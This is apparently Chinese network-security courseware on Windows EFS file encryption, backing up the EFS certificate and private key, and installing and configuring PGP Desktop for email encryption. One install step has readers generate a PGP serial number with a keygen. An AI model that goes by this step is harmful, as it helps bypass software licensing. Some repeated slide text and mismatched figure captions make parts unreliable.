《網(wǎng)絡(luò)安全防護(hù)項(xiàng)目教程》 課件匯 吳獻(xiàn)文 項(xiàng)目7-13 文件的加密與解密- 網(wǎng)絡(luò)攻擊實(shí)施

學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握文件的加解密并靈活使用掌握郵件的加解密并靈活使用能夠熟練使用加密軟件并通曉原理能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣能與組員精誠合作，能正確面對他人的成功或失敗具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解文件加密和解密的基本概念了解郵件加密和解密的基本概念了解備份密鑰重要性掌握PGP軟件的使用7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述配置的流程怎樣？什么是文件的加密與解密？加密解密有哪些作用？為什么要使用專門的加密軟件？12347.3任務(wù)分析本項(xiàng)目的具體任務(wù)有哪些？5任務(wù)7-1文件的加密與解密 1.認(rèn)識EFSEFS（EncryptingFileSystem，加密文件系統(tǒng)）是Windows操作系統(tǒng)中的一個實(shí)用功能，可以直接對NTFS卷上的文件和數(shù)據(jù)加密保存，提高了數(shù)據(jù)安全性。EFS加密是基于公鑰策略的，綜合了對稱加密和不對稱加密。使用EFS加密一個文件或文件夾的過程如下。（1）系統(tǒng)首先生成一個由偽隨機(jī)數(shù)組成的FEK（FileEncryptionKey，文件加密密鑰），然后利用FEK和數(shù)據(jù)擴(kuò)展標(biāo)準(zhǔn)X算法創(chuàng)建加密后的文件，并把它存儲到硬盤上，同時刪除未加密的原始文件。子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 （2）系統(tǒng)利用公鑰加密FEK，并把加密后的FEK存儲在同一個加密文件中。（3）在訪問被加密的文件時，系統(tǒng)首先利用當(dāng)前用戶的私鑰解密FEK，然后利用FEK解密出文件。在首次使用EFS時，如果用戶還沒有公鑰/私鑰對（統(tǒng)稱為密鑰），則會首先生成密鑰，然后再加密數(shù)據(jù)。如果登錄到域環(huán)境中，密鑰的生成依賴于域控制器，否則依賴于本地機(jī)器。子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 EFS加密系統(tǒng)對用戶是透明的，即加密了一些數(shù)據(jù)，用戶對這些數(shù)據(jù)具有完全訪問權(quán)限。而其他非授權(quán)用戶試圖訪問加密過的數(shù)據(jù)時，就會收到“訪問拒絕”的錯誤提示。子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 2.加密小明計算機(jī)的C盤為FAT32文件系統(tǒng)，D盤為NTFS文件系統(tǒng)，現(xiàn)采用EFS分別加密兩個文件系統(tǒng)下的文件或文件夾，以比較哪個更安全。加密的方式由多種，本任務(wù)主要介紹在資源管理器上對文件或文件夾加密和采用命令方式加密兩種。子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 （1）在資源管理器上加密文件和文件夾步驟1：打開磁盤格式為NTFS的磁盤，選擇要進(jìn)行加密的文件，如“C:\test\新建文本文檔”。右擊打開“屬性”窗口，如圖7-1-1所示，選擇“常規(guī)”選項(xiàng)，單擊“高級”按鈕。選中“高級屬性”對話框下邊“壓縮或加密屬性”中的“加密內(nèi)容以便保護(hù)數(shù)據(jù)（E）”復(fù)選框。子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 圖7-1-1“高級屬性”對話框子任務(wù)7-1-1使用EFS加密文件和文件夾任務(wù)7-1文件的加密與解密 步驟2：單擊“確定”按鈕，返回“新建文本文檔屬性”對話框，單擊“確定”按鈕，第一次加密該文件夾時會彈出如圖7-1-2所示“確認(rèn)屬性更改”對話框。根據(jù)應(yīng)用要求選中一個單選項(xiàng)，本任務(wù)中選中“將更改應(yīng)用于該文件夾、子文件夾和文件”項(xiàng)。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-2“確認(rèn)屬性更改”對話框任務(wù)7-1文件的加密與解密 步驟3：單擊“確定”按鈕，彈出“應(yīng)用屬性”對話框，如圖7-1-3所示。開始對test文件夾中的文件和子文件夾進(jìn)行加密操作，待該屬性對話框中的綠色進(jìn)度條全部完成后，發(fā)現(xiàn)test文件夾變?yōu)榫G色，其中的所有子文件夾和文件名均變?yōu)榫G色，表明該文件夾中的子文件夾和文件都已經(jīng)進(jìn)行了加密。當(dāng)其他用戶登錄系統(tǒng)后打開該文件，就會出現(xiàn)“拒絕訪問”提示，表示EFS加密成功。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-3“應(yīng)用屬性”對話框任務(wù)7-1文件的加密與解密 （2）在命令提示符下進(jìn)行文件和文件夾加密。①進(jìn)入DOS命令提示符狀態(tài)。步驟1：單擊“開始”，選擇“運(yùn)行”，彈出如圖7-1-4所示的“運(yùn)行”文本框。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-4“運(yùn)行”文本框任務(wù)7-1文件的加密與解密 步驟2：在文本框中輸入cmd，單擊“確定”按鈕，進(jìn)入DOS命令提示符狀態(tài)。在命令提示符下輸入cipher/?命令，顯示加密命令所能使用的所有參數(shù)，如圖7-1-5所示。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-5獲取cipher命令的幫助信息任務(wù)7-1文件的加密與解密 ②加密文件或文件夾（對文件或文件夾進(jìn)行加密操作）?！?加密E：/test/1.doc文件。步驟1：在命令提示符窗口中將當(dāng)前操作符轉(zhuǎn)換到e：操作符，運(yùn)行“cipher/e/atest/1.doc”命令后，完成對1.doc文件的加密，系統(tǒng)提示如圖7-1-6所示。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-6加密E盤test文件夾下1.doc文件的操作任務(wù)7-1文件的加密與解密 步驟2：查看該文件，發(fā)現(xiàn)文件名已經(jīng)轉(zhuǎn)換為綠色，表明加密成功?！窦用蹺:\test文件夾。在命令提示符E：\>下，輸入“cipher/etest”命令，回車后出現(xiàn)目錄加密成功的提示，如圖7-1-7所示說明加密成功。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-7加密E盤test文件夾的操作任務(wù)7-1文件的加密與解密 ●加密E:\test2下的所有子目錄。在命令提示符E：\>下，運(yùn)行“cipher/e/s:test2”命令即可，如圖7-1-8所示。子任務(wù)7-1-1使用EFS加密文件和文件夾圖7-1-8加密E盤test文件夾的操作學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握密鑰備份能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成細(xì)心檢查的學(xué)習(xí)習(xí)慣具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解密鑰的含義了解備份密鑰重要性7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述密鑰備份的流程怎樣？什么是密鑰？備份密鑰有哪些作用？為什么要進(jìn)行密鑰備份？12347.3任務(wù)分析任務(wù)7-1文件的加密與解密

步驟1：新建用戶。創(chuàng)建名為user的新用戶，且不要創(chuàng)建為計算機(jī)管理員用戶。步驟2：依次單擊“開始”——“注銷”命令，然后單擊“切換用戶（S）”，登錄新建的USER用戶，如圖7-1-9所示。子任務(wù)7-1-2密鑰備份圖7-1-9“拒絕訪問”信息任務(wù)7-1文件的加密與解密

步驟3：在“C:\test”目錄下，雙擊“新建文本文檔”，發(fā)現(xiàn)無法打開該文件，說明加密成功，如圖7-1-10所示。子任務(wù)7-1-2密鑰備份圖7-1-10“拒絕訪問”信息任務(wù)7-1文件的加密與解密

步驟4：再次切換用戶，以原來加密文件夾的管理員賬戶登錄系統(tǒng)。單擊“開始”按鈕，在“運(yùn)行”框中入mmc，如圖7-1-11所示。子任務(wù)7-1-2密鑰備份圖7-1-11運(yùn)行文本框任務(wù)7-1文件的加密與解密

步驟5：單擊“確定”按鈕，打開如圖7-1-12所示的系統(tǒng)控制臺。單擊左上角的“文件”工具，在展開的菜單中選中“添加∕刪除管理單元（M）…”。子任務(wù)7-1-2密鑰備份圖7-1-12系統(tǒng)控制臺操作任務(wù)7-1文件的加密與解密

步驟6：單擊，打開“添加∕刪除管理單元”對話框，單擊“添加”按鈕，打開如圖7-1-13所示的“添加獨(dú)立管理單元”對話框，然后找到“證書”并選中。子任務(wù)7-1-2密鑰備份圖7-1-13“添加獨(dú)立管理單元”對話框任務(wù)7-1文件的加密與解密

步驟7：單擊“添加”按鈕。打開如圖7-1-14所示的“證書管理單元”對話框，選擇“我的用戶賬戶”單選項(xiàng)，單擊“完成”按鈕。子任務(wù)7-1-2密鑰備份圖7-1-14“證書管理單元”對話框任務(wù)7-1文件的加密與解密

步驟8：打開如圖7-1-15所示的“控制臺根節(jié)點(diǎn)\證書-當(dāng)前用戶\個人\證書”對話框，在控制臺窗口左側(cè)的目錄樹中選擇“證書-當(dāng)前用戶”→“個人”→“證書”。在右側(cè)的窗口中顯示用于加密文件系統(tǒng)的證書。（也可以使用如下方式完成：單擊“開始”，打開“運(yùn)行”文本框，輸入certmgr.msc命令，打開如圖3-1-15所示的“控制臺根節(jié)點(diǎn)\證書-當(dāng)前用戶\個人\證書”對話框。單擊“證書→當(dāng)前用戶”下的“個人”→“證書”，只要以前做過加密操作，右邊窗口就會有與用戶名同名的證書，如Administrator）子任務(wù)7-1-2密鑰備份圖7-1-15“控制臺根節(jié)點(diǎn)\證書-當(dāng)前用戶\個人\證書”對話框任務(wù)7-1文件的加密與解密

步驟9：選中證書，單擊右鍵，在菜單中單擊“所有任務(wù)”→“導(dǎo)出”，如圖7-1-16所示。

子任務(wù)7-1-2密鑰備份圖7-1-16“所有任務(wù)”→“導(dǎo)出”操作任務(wù)7-1文件的加密與解密

步驟10：打開如圖7-1-17所示的“證書導(dǎo)出向?qū)А?。子任?wù)7-1-2密鑰備份圖7-1-17“證書導(dǎo)出向?qū)А睂υ捒蛉蝿?wù)7-1文件的加密與解密

步驟11：單擊“下一步”按鈕，打開如圖7-1-18所示的“證書導(dǎo)出向?qū)?導(dǎo)出私鑰”項(xiàng)，選擇“是，導(dǎo)出私鑰”單選項(xiàng)。子任務(wù)7-1-2密鑰備份圖7-1-18“證書導(dǎo)出向?qū)?導(dǎo)出私鑰”項(xiàng)任務(wù)7-1文件的加密與解密

步驟12：單擊“下一步”按鈕，打開如圖7-1-19所示的“證書導(dǎo)出向?qū)?導(dǎo)出文件格式”項(xiàng)，選擇“私人信息交換-pkcs#12（.pfx）（p）”單選項(xiàng)。子任務(wù)7-1-2密鑰備份圖7-1-19“證書導(dǎo)出向?qū)?導(dǎo)出文件格式”項(xiàng)任務(wù)7-1文件的加密與解密

步驟13：單擊“下一步”按鈕，打開“證書導(dǎo)出向?qū)?密碼”項(xiàng)，設(shè)置保護(hù)私鑰的密碼并確認(rèn)該密碼，如圖7-1-20所示。子任務(wù)7-1-2密鑰備份圖7-1-20“證書導(dǎo)出向?qū)?密碼”項(xiàng)任務(wù)7-1文件的加密與解密

步驟14：單擊“下一步”按鈕，設(shè)置要導(dǎo)出文件的文件名，并設(shè)置要導(dǎo)出文件的保存路徑，注意一定要保存在C盤，然后完成證書導(dǎo)出，如圖7-1-21所示。子任務(wù)7-1-2密鑰備份圖7-1-21保存路徑設(shè)置任務(wù)7-1文件的加密與解密

步驟15：再次切換用戶，以新建的USER登錄系統(tǒng)，如前面步驟打開控制臺并添加證書，然后選中“個人”項(xiàng)，如圖7-1-22所示，右邊窗格中并沒有顯示證書。子任務(wù)7-1-2密鑰備份圖7-1-22“控制臺根節(jié)點(diǎn)\證書–當(dāng)前用戶\個人”對話框任務(wù)7-1文件的加密與解密

步驟16：選中“個人”項(xiàng)，鼠標(biāo)右鍵，在彈出的菜單中選擇“所有任務(wù)（K）”→“導(dǎo)入”，單擊，如圖7-1-23所示。子任務(wù)7-1-2密鑰備份圖7-1-23“所有任務(wù)”→“導(dǎo)入”操作任務(wù)7-1文件的加密與解密

步驟17：打開如圖7-1-24所示的“證書導(dǎo)入向?qū)А睂υ捒?。子任?wù)7-1-2密鑰備份圖7-1-24“證書導(dǎo)入向?qū)А睂υ捒蛉蝿?wù)7-1文件的加密與解密

步驟18：單擊“瀏覽”按鈕，在私鑰地址瀏覽中，打開C盤，選擇“文件類型”的“所有文件”如圖7-1-25所示。子任務(wù)7-1-2密鑰備份圖7-1-25“打開”對話框任務(wù)7-1文件的加密與解密

步驟19：選擇“siyue”文件，單擊“打開”按鈕，打開私鑰文件。單擊“下一步”，輸入之前設(shè)置的密碼，如圖7-1-26所示。然后單擊“下一步”，完成文件“導(dǎo)入”。子任務(wù)7-1-2密鑰備份圖7-1-26“證書導(dǎo)入向?qū)?為私鑰鍵入密碼”對話框任務(wù)7-1文件的加密與解密

步驟20：完成導(dǎo)入后可以再通過控制臺的“個人”欄查看，發(fā)現(xiàn)已經(jīng)有了一個新的證書，如圖7-1-27所示。子任務(wù)7-1-2密鑰備份圖7-1-27導(dǎo)入證書完成界面任務(wù)7-1文件的加密與解密

步驟21：再次進(jìn)入C盤，雙擊加密文件夾中的文件，現(xiàn)在文件可以正常打開，如圖7-1-28所示。子任務(wù)7-1-2密鑰備份圖7-1-28打開“新建文本文檔”學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握文件解密并靈活使用能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解文件加密后情形了解解密文件的操作流程7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.1情境描述什么是文件解密？解密的操作流程？如何進(jìn)行解密操作？1237.3任務(wù)分析任務(wù)7-1文件的加密與解密

EFS的使用難點(diǎn)不是對文件和文件夾進(jìn)行加密，而是對加密后的文件和文件夾進(jìn)行解密。要解密一個文件，首先要對文件加密密鑰進(jìn)行解密。當(dāng)用戶的私鑰與公鑰匹配時，用于文件加密的密鑰就被解密。1．在資源管理器上對文件和文件夾進(jìn)行解密（1）在已用EFS加密的NTFS文件或文件夾上右鍵單擊，在彈出的菜單中選擇“屬性”，打開相應(yīng)文件或文件夾的屬性對話框，在對話框中選擇“常規(guī)”選項(xiàng)卡。（2）單擊“高級”按鈕，打開“高級屬性”對話框。取消選中“加密內(nèi)容以便保護(hù)數(shù)據(jù)”復(fù)選框，然后單擊“確定”按鈕，返回屬性對話框。子任務(wù)7-1-3解密文件任務(wù)7-1文件的加密與解密

（3）單擊“應(yīng)用”或“確定”按鈕，如果解密的是NTFS文件夾，則會彈出如圖7-1-29所示的“確認(rèn)屬性更改”對話框。。子任務(wù)7-1-3解密文件圖7-1-29“確認(rèn)屬性更改”對話框圖任務(wù)7-1文件的加密與解密 系統(tǒng)將詢問是否要同時將文件夾內(nèi)的所有文件和子文件夾解密。如果選擇“僅將更改應(yīng)用于該文件夾”單選按鈕，則解密文件夾中的加密文件和文件夾仍保持加密。但是，在已解密文什夾內(nèi)創(chuàng)立的新文件和文件夾將不會被自動加密。如果選擇的是“將更改應(yīng)用于該文件夾、子文件夾和文件”單選按鈕，則將同時對該文件夾以及其下的子文件夾和文件進(jìn)行解密。子任務(wù)7-1-3解密文件任務(wù)7-1文件的加密與解密 2．在命令提示符窗口運(yùn)用命令解密文件或文件夾與使用命令加密文件或文件夾一樣，如果不知道解密命令如何使用，可以在命令提示符下輸入“cipher/?”命令以獲取幫助信息，得到參數(shù)的使用情況。（1）解密文件夾。要將前面已經(jīng)加密的test文件夾解密，則可在命令提示符窗口中運(yùn)行“cipher/dtest”命令后，就將test目錄解密。（2）解密所有子目錄。要解密test目錄下的所有子目錄，則需運(yùn)行“cipher/d/s:test”命令。（3）解密文件。要解密test目錄中的1.doc文件，運(yùn)行“cipher/d/atest/1.doc”命令；要解密該目錄中的所有文件，可運(yùn)行“cipher/d/atest/*”命令。子任務(wù)7-1-3解密文件任務(wù)7-1文件的加密與解密

3．用備份的密鑰解密文件或文件夾（1）剛才已經(jīng)備份有PFX私鑰文件，重裝系統(tǒng)后要想打開加密文件，則需要首先找到備份的PFX私鑰文件，然后鼠標(biāo)右鍵單擊該文件，在彈出的菜單中選擇“安裝PFX”，如圖7-1-30所示。子任務(wù)7-1-3解密文件圖7-1-30“安裝PFX”選項(xiàng)”任務(wù)7-1文件的加密與解密

（2）系統(tǒng)將彈出“證書導(dǎo)入向?qū)А睂υ捒?，輸入?dāng)初導(dǎo)出證書時保存證書的路徑并且輸入密碼，然后選擇“根據(jù)證書類型，自動選擇證書存儲區(qū)”即可，如圖7-1-31所示。完成后就可以訪問EFS加密文件了。子任務(wù)7-1-3解密文件圖7-1-31“證書導(dǎo)入向?qū)?證書存儲”對話框?qū)W習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握郵件的加解密并靈活使用能夠熟練使用加密軟件并通曉原理能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解PGP是什么了解郵件加密和解密的基本概念7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述PGP安裝的流程怎樣？什么是PGP？PGP有哪些作用？下載PGP？12347.3任務(wù)分析任務(wù)7-2郵件加密與解密 PGP軟件是基于RSA公鑰加密體系的郵件加密軟件，可以用來對郵件保密以防止非授權(quán)者閱讀。PGP還能對用戶的郵件添加數(shù)字簽名，從而使收信人可以確認(rèn)發(fā)信人的身份。PGP采用了非對稱的公鑰和私鑰加密體系，公鑰對外公開，私鑰個人保留，不為外人所知。也就是說用公鑰加密的密文只可以用私鑰解密，而不知道私鑰的話，即使是發(fā)信本人也不能解密。為了使收件人能夠確認(rèn)發(fā)信人的身份，PGP使用數(shù)字簽名來確認(rèn)發(fā)信人的身份。下面詳細(xì)介紹如何使用PGP軟件來加密電子郵件。（1）選擇符合系統(tǒng)的PGP軟件，下載（本任務(wù)中使用64位的）。用戶可以到PGP公司的官方網(wǎng)站上下載PGP軟件30天的試用版。子任務(wù)7-2-1PGP軟件下載與安裝任務(wù)7-2郵件加密與解密 （2）安裝PGP軟件。步驟1：下載PGP軟件后，鼠標(biāo)左鍵雙擊PGPDesktopWin64-10.0.3文件進(jìn)行安裝，打開如圖7-2-1所示界面。選擇“English”，單擊“OK”。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-1“證書導(dǎo)入向?qū)А睂υ捒蛉蝿?wù)7-2郵件加密與解密 步驟2：顯示如圖7-2-2所示的許可協(xié)議界面，選擇“Iacceptthelicenseagreement”。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-2“PGPDesktopSetup–LicenseAgreement”對話框任務(wù)7-2郵件加密與解密 步驟3：單擊“Next”按鈕，會彈出如圖7-2-3所示的對話框。建議選中“DonotdisplaytheReleaseNotes”單選項(xiàng)。子任務(wù)7-2-1PGP軟件下載與安裝7-2-3“PGPDesktopSetup–DisplayReleaseNotes”對話框任務(wù)7-2郵件加密與解密 步驟4：單擊“Next”按鈕，會彈出如圖7-2-4所示的對話框。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-4“用戶帳戶控制”對話框任務(wù)7-2郵件加密與解密 步驟5：單擊“是（Y）”，打開如圖7-2-5所示的對話框，等待安裝完成。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-5“PGPDesktopSetup–UpdatingSystem”對話框任務(wù)7-2郵件加密與解密 步驟6：完成后彈出如圖7-2-6所示的對話框，提示重新啟動系統(tǒng)，單擊“Yes”按鈕，讓設(shè)置生效。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-6“InstallerInformation”對話框任務(wù)7-2郵件加密與解密 步驟7：重新啟動后打開如圖7-2-7所示的“PGPSetupAssistant”對話框。如果不打算在此帳戶上使用PGP，則沒有必要完成。選中“Yes”單選項(xiàng)，單擊“下一步”按鈕。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-7“InstallerInformation”對話框任務(wù)7-2郵件加密與解密 步驟8：打開如圖7-2-8所示的對話框。在該界面上輸入注冊號所需要鏈接的信息，如“Name”、“Organization”、“EmailAddress”信息。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-8“PGPSetupAssistant”對話框任務(wù)7-2郵件加密與解密 步驟9：單擊“下一步”按鈕，需要輸入序列號。則打開如圖7-2-9所示的注冊機(jī)，輸入“Name”及“Company”信息，單擊“Generate”按鈕，會在“Serial”項(xiàng)中生成序列號，將此字符串填入軟件的“SerialNumber”中，單擊“確定”按鈕。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-9“注冊機(jī)”界面任務(wù)7-2郵件加密與解密 步驟10：密鑰生成。打開如圖7-2-10所示的“CreatePassphrase”對話框，選中“ShowKeystrokes”復(fù)選框（避免兩次輸入的密碼不一致），則會顯示在“EnterPassphrase”中輸入的字符串（不少于8位），這是為密鑰對中的私鑰配置保護(hù)密碼。在“Re-enterPassphrase”文本框中再輸入一遍剛才設(shè)置的密碼。設(shè)置完成后，建議取消該選項(xiàng)，以免別人能看到你的密碼。在使用PGP之前，首先需要生成一對密鑰，這一對密鑰是同時生成的，將其中的一個密鑰分發(fā)給你的朋友，讓他們用這個密鑰來加密文件，該密鑰即為“公鑰”。另一個密鑰由使用者自己保存，使用者用這個密鑰來解開用公鑰加密的文件，稱為私鑰。子任務(wù)7-2-1PGP軟件下載與安裝任務(wù)7-2郵件加密與解密 子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-10“PGPSetupAssistant–CreatePassphrase”對話框任務(wù)7-2郵件加密與解密 步驟11：單擊“下一步”按鈕，進(jìn)入KeyGenerationProgress（密鑰生成進(jìn)程），等待主密鑰（Key）和次密鑰（Subkey）生成完畢。單擊“下一步”按鈕完成密鑰生成向?qū)?，如圖7-2-11所示。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-11KeyGenerationProgress對話框任務(wù)7-2郵件加密與解密 步驟12：然后一直單擊“下一步”按鈕，直到打開如圖7-2-12所示的對話框，單擊“完成”按鈕，PGP軟件安裝成功。子任務(wù)7-2-1PGP軟件下載與安裝圖7-2-12“Congratulations!”對話框任務(wù)7-2郵件加密與解密 步驟13：安裝完成后，在“程序”中會顯示項(xiàng)，在右下角會顯示。子任務(wù)7-2-1PGP軟件下載與安裝學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練使用加密軟件并通曉原理能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解PGP軟件界面掌握PGP軟件的基本配置方法7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述分析PGP軟件界面？完成PGP軟件基本配置？127.3任務(wù)分析任務(wù)7-2郵件加密與解密 PGP基本配置步驟如下。步驟1：單擊“”圖標(biāo)，打開如圖7-2-13所示菜單。主要菜單含義如表所示。子任務(wù)7-2-2PGP軟件基本配置任務(wù)7-2郵件加密與解密 PGP基本配置步驟如下。步驟1：單擊“”圖標(biāo)，打開如圖7-2-13所示菜單。主要菜單含義如表所示。子任務(wù)7-2-2PGP軟件基本配置圖7-2-13“PGPDesktop”菜單任務(wù)7-2郵件加密與解密 步驟2：在菜單中選擇“Options…”，單擊打開如圖7-2-14所示對話框，設(shè)置相應(yīng)內(nèi)容。子任務(wù)7-2-2PGP軟件基本配置圖7-2-14“PGPOptions”對話框“General”選項(xiàng)卡任務(wù)7-2郵件加密與解密 步驟3：如設(shè)置“Disk”選項(xiàng)中的內(nèi)容。單擊“Disk”選項(xiàng)卡，打開如圖7-2-15所示“PGPOptions”對話框，根據(jù)實(shí)際情況需要設(shè)置相應(yīng)的內(nèi)容。子任務(wù)7-2-2PGP軟件基本配置圖7-2-15“PGPOptions”對話框“Disk”選項(xiàng)卡任務(wù)7-2郵件加密與解密 步驟4：在“程序”中單擊項(xiàng)，打開如圖7-2-16所示的對話框，可以根據(jù)菜單項(xiàng)設(shè)置各項(xiàng)內(nèi)容。子任務(wù)7-2-2PGP軟件基本配置圖7-2-16“PGPDesktop–PGPLog”對話框?qū)W習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握郵件的加解密并靈活使用能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣了解電子郵件的結(jié)構(gòu)了解郵件加密和解密的基本概念7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述電子郵件結(jié)構(gòu)？加密電子郵件？加密電子郵件的操作流程？1237.3任務(wù)分析任務(wù)7-2郵件加密與解密 1．PGP密鑰發(fā)布PGP使用兩個密鑰來管理數(shù)據(jù)：一個用以加密，稱為公鑰（PublicKey）；另一個用以解密，稱為私鑰（PrivateKey）。公鑰和私鑰是緊密聯(lián)系在一起的，公鑰只能用來加密需要安全傳輸?shù)臄?shù)據(jù)，卻不能解密加密后的數(shù)據(jù)；相反，私鑰只能用來解密，卻不能加密數(shù)據(jù)。1）工作流程出于對傳輸文檔安全的考慮，需要加密文檔，如Green需要發(fā)送機(jī)密文件給Star，其工作流程如下如下。（1）Star首先要把自己的公鑰發(fā)布給Green。（2）Green用Star老總發(fā)過來的公鑰對文檔標(biāo)書進(jìn)行加密。（3）Green將加密文件發(fā)送給Star。（4）Star用私鑰將文件解密，讀取文件內(nèi)容。子任務(wù)7-2-3加密電子郵件任務(wù)7-2郵件加密與解密 該工作流程如圖7-2-17所示。子任務(wù)7-2-3加密電子郵件圖7-2-17文件加載界面任務(wù)7-2郵件加密與解密 2）密鑰發(fā)布密鑰發(fā)布過程如下。步驟1：在“程序”中單擊“PGPDesktop”，選中左邊窗格中的“MyPrivateKeys”，打開如圖所示的“PGPDesktop-MyPrivateKeys”對話框。在用戶IDKEYS處依次展開“Name”項(xiàng)，鼠標(biāo)右鍵，彈出如圖7-2-18所示菜單。子任務(wù)7-2-3加密電子郵件圖7-2-18“PGPDesktop–MyPrivateKeys”對話框任務(wù)7-2郵件加密與解密 